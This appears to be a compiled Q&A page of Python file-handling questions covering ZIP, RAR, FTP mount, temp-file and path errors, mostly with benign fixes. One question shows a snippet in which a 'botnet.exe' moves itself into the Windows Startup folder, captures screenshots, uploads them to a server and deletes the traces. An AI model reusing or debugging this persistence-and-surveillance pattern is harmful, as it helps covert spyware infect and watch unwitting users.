Error BadZipFile inconsistently raised - python

I am using selenium to successively download a number of ZIP files which I subsequently rename and unzip.
os.rename(F"C:/Users/Info/Desktop/PR RAW 3000/Test.ZIP", F"C:/Users/Info/Desktop/PR RAW 3000/12345.ZIP") ##Rename downloaded file
time.sleep(2)
#Unzip File
target_zip = F"C:/Users/Info/Desktop/PR RAW 3000/12345.ZIP"
os.mkdir(F'C:/Users/Info/Desktop/PR RAW 3000/12345_Sample') ##Create path
handle = zipfile.ZipFile(target_zip)
handle.extractall(F'C:/Users/Info/Desktop/PR RAW 3000/12345_Sample') ##Unzip file into created path
handle.close()
The code works just fine most of the time. Sometimes, though, the error BadZipFile: File is not a zip file is raised and I have no idea why. The error appears inconsistently: when the code breaks at one specific file and I restart it, it runs smoothly past the point where it previously failed.
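One possible explanation, not confirmed by anything in the question, is that the fixed time.sleep(2) sometimes ends before the browser has finished writing the archive. A minimal sketch of polling until the file looks like a complete ZIP before extracting it follows. The function names, the timeout, and the polling interval are all hypothetical choices for illustration.

```python
import time
import zipfile
from pathlib import Path


def wait_for_complete_zip(path, timeout=30.0, poll=0.5):
    """Return True once `path` exists and looks like a ZIP, False on timeout."""
    path = Path(path)
    deadline = time.monotonic() + timeout
    while True:
        # is_zipfile looks for the end-of-central-directory record, which sits
        # at the end of the archive, so a partial download normally fails here.
        if path.is_file() and zipfile.is_zipfile(path):
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(poll)


def extract_when_ready(zip_path, dest_dir, timeout=30.0):
    """Extract `zip_path` into `dest_dir` once the archive looks complete."""
    if not wait_for_complete_zip(zip_path, timeout=timeout):
        raise TimeoutError(f"{zip_path} did not become a valid ZIP in {timeout}s")
    Path(dest_dir).mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(zip_path) as handle:
        handle.extractall(dest_dir)
```

With the paths from the question, extract_when_ready(target_zip, F'C:/Users/Info/Desktop/PR RAW 3000/12345_Sample') would stand in for the mkdir, ZipFile, extractall, and close calls. If the error persists even with a generous timeout, the download itself is probably the thing to investigate.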

Related

RAR files not downloading correctly using requests module

Recently, I was creating an installer for my project. It involves downloading a RAR file from my server, unRAR-ing it and putting those folders into the correct locations.
Once it's downloaded, the program is supposed to unRAR it, but instead it gives me an error in the console: Corrupt header of file.
I should note that this error is coming from the unRAR program bundled with WinRAR.
I also tried opening the file using the GUI of WinRAR, and it gave the same error.
I'm assuming while it's being downloaded, it's being corrupted somehow?
Also, when I download it manually using a web browser, it downloads fine.
I've tried this code:
KALI = "URL CENSORED"
kali_res = requests.get(KALI, stream=True)
for chunk in kali_res.iter_content(chunk_size=128):
    open(file_path, "wb").write(chunk)
..but it still gives the same error.
Could someone please help?
You keep re-opening the file for every chunk.
Not only does this leak file descriptors, it also means you keep overwriting the file.
Try this instead:
KALI = "URL CENSORED"
kali_res = requests.get(KALI, stream=True)
with open(file_path, "wb") as outfile:
    for chunk in kali_res.iter_content(chunk_size=128):
        outfile.write(chunk)

Intermittent "No such file or directory" and permission errors when opening files (in a loop) on mounted FTP drive (linux)? Sync issue?

Getting errors like
FileNotFoundError: [Errno 2] No such file or directory: '/path/to/files/file.pdf'
when trying to loop through and open files in a mounted FTP drive (mounted via curlftpfs 'myuser:mypassword'#MY.SERVER.IP /path/to/files). I suspect sync issues, as the mounted drive is from another server on our network.
I can see that the file is there, can open it manually, can ls '/path/to/files/file.pdf' to see the file, but when executing...
FILES = os.listdir('/path/to/files')
FILES.sort()
.
.
.
for file in FILES:
    with open(os.path.join('/path/to/files', 'file.pdf'), 'rb') as fd:
        ...  # do stuff
... I sometimes get the FileNotFoundError.
More confusing, I can actually open this file (using the same path string that the error message tells me is not a file or directory) separately by just starting a Python interactive shell and running something like...
fd = open('/path/to/files/file.pdf', 'rb')
fd.read()
...so IDK what the issue could be when reading it in a list of files.
Any debugging ideas or ideas of what could be causing this? Could there be some kind of timing/sync issues between reading the files on the mounted FTP drive vs the script that is running locally (and how to fix)?
* UPDATE:
Oddly, printing the target path before trying to open the file like...
print(os.path.join('/path/to/files', 'file.pdf'))
time.sleep(2) # giving even more time after initial access
with open(os.path.join('/path/to/files', 'file.pdf'), 'rb') as fd:
    ...  # do stuff
...seems to help (kinda). Now also randomly throws PermissionErrors for random files that I had no problem reading before (still occasionally throws FileNotFoundErrors) and that I can actually open when accessing individually in python interactive shell. Makes me moreso think it is some kind of sync issue. Will need to investigate more.
os.path is a module, so calling it directly, as in os.path('/path/to/files/file.pdf'), raises a TypeError.
But I don't think that is the cause of the FileNotFoundError.
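If the errors really are transient, as the question suspects, one workaround is to retry the open a few times before giving up. The sketch below assumes this, and it only masks the underlying mount behaviour rather than explaining it. The helper name, the attempt count, and the delay are hypothetical.

```python
import time


def open_with_retry(path, mode="rb", attempts=5, delay=1.0):
    """Open `path`, retrying on FileNotFoundError or PermissionError."""
    for attempt in range(1, attempts + 1):
        try:
            return open(path, mode)
        except (FileNotFoundError, PermissionError):
            if attempt == attempts:
                raise  # out of attempts: surface the last error unchanged
            time.sleep(delay)
```

It is used like the built-in: with open_with_retry(os.path.join('/path/to/files', file)) as fd: and so on. A file that is truly missing still raises FileNotFoundError after the last attempt.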

PIL raises .png Key Error after exe file is moved to another directory

I've written a script that, when executed, moves its own exe file (a "onefile" exe created with pyinstaller) to another directory using shutil.move(), so the exe is deleted from the original directory and appears in the new one. It then takes a screenshot and saves it somewhere. The problem is that the screenshot is never taken: a ValueError is raised (ValueError: unknown file extension: .png) along with a KeyError (KeyError: 'PNG'). Using the copy2 method instead does not raise these errors and the screenshot is captured, but that is not what I want; I want the file to be deleted from its original directory.
When the script is run in its original .py format (not packaged into one exe file), everything works fine: the .py file moves to another location and the screenshot is captured.
Why is this happening with the move method? What is the solution?
Here is my snippet (username is already properly defined):
if not path.exists("C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\botnet.exe".format(username)):
    filePy = path.realpath(__file__)
    filepathexe = filePy.replace(".py", ".exe")
    shutil.move(filepathexe, "C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup".format(username)) ##shutil.copy2 works fine
def takess():
    pyautogui.screenshot("C:\\Users\\%s\\scrn.png"%username)
    # after capturing the screenshot, it is uploaded to a server
    data = open('C:\\Users\\%s\\scrn.png'%username, 'rb') #data is uploaded to a server
    remove('C:\\Users\\%s\\scrn.png'%username) # removing the screenshot png file
I believe the part of my code that reads the file as binary, sends it to a server, and then deletes it is not the problem, because the screenshot is never captured in the first place. (As I said, executing the original .py file or using shutil.copy2() solves the issue.)

Ignore "temp" files?

I've had a script that has been running without issues for a while; however, it recently hit a "hitch" with a temporary file in one of the directories.
The file in question started with '~$' on a Windows PC, so the script errored out on it because it is not a proper DOCX file. The file was not open, and the problem occurred after the files were transferred off a network drive onto an external hard drive. Checking the destination drive (with hidden files shown, etc.) did not show this file either.
I have attempted a quick fix of:
for (dirpath,dirnames,filenames) in os.walk('.'):
    for filename in filenames:
        if filename.endswith('.docx'):
            filesList.append(os.path.join(dirpath,filename))
for file in filesList:
    if file.startswith('~$'):
        pass
    else:
        <rest of script>
However, the script appears to ignore this check, proceeds, and then errors out again because the file is not "valid".
Does anyone know either why this isn't working or a quick way to get it to ignore any files like this? I would attempt an "if exists" check, but the file technically does exist, so this wouldn't work either.
Sorry if it's a bit stupid, but I am a bit stumped as to A. why it's there and B. how to code around it.
In the second code block, your variable file contains the whole file path, not just the file name.
Skip the "bad" files in your first block rather than appending them to the list:
for (dirpath,dirnames,filenames) in os.walk('.'):
    for filename in filenames:
        if filename.endswith('.docx'):
            if not filename.startswith('~$'):
                filesList.append(os.path.join(dirpath,filename))
The other option would be to check os.path.basename(file) in your second code block.
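A minimal sketch of that second option: the check runs against the last path component instead of the full path. The helper name is_temp_docx and the sample paths are made up for illustration.

```python
import os


def is_temp_docx(path):
    """True if the file name (not the full path) starts with '~$'."""
    return os.path.basename(path).startswith("~$")


# Hypothetical list, shaped like the one built by os.walk in the question.
files_list = [
    os.path.join(".", "reports", "summary.docx"),
    os.path.join(".", "reports", "~$summary.docx"),
]

for file in files_list:
    if is_temp_docx(file):
        continue  # skip the '~$' temp file
    print("processing", file)
```

The original check never matched because every entry in the list begins with the directory part (for example "." followed by a separator), not with '~$'.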

filenotfound error python (running through atom)

I'm working my way through the Python Crash Course PDF. Everything was going well until I hit chapter 10, "Files and Exceptions".
The task is very simple.
1) create a text file "pi_digits.txt" that contains the first 30 digits of pi.
2) run the following code:
with open('pi_digits.txt') as file_object:
    contents = file_object.read()
print(contents)
I keep getting a FileNotFoundError [Errno 2].
I have tried using the full file path, and placing the file in the same ~.atom folder that contains the package 'script'.
I tried to run the file through a terminal and got the same error message.
I also searched Stack Overflow for solutions and did find similar problems, but the answers did not work.
Any help would be appreciated.
Prepend this:
import os
print(os.getcwd())
os.chdir('/tmp')
and copy the .txt file to /tmp. Also, be sure the copied filename is all lowercase, to match your program.
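An alternative to changing the working directory, sketched here on the assumption that pi_digits.txt sits in the same folder as the script, is to build the path from the script's own location. A relative name like 'pi_digits.txt' is resolved against the current working directory, which an editor may set to something unexpected. The helper name path_beside is hypothetical.

```python
from pathlib import Path


def path_beside(script_path, filename):
    """Return the absolute path of `filename` in the folder holding `script_path`."""
    return Path(script_path).resolve().parent / filename


# Typical use inside a script (left as a comment because __file__ is only
# defined when the code is run from a file):
# with open(path_beside(__file__, 'pi_digits.txt')) as file_object:
#     contents = file_object.read()
# print(contents)
```

This way the file is found no matter which directory the editor or terminal launches the script from.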
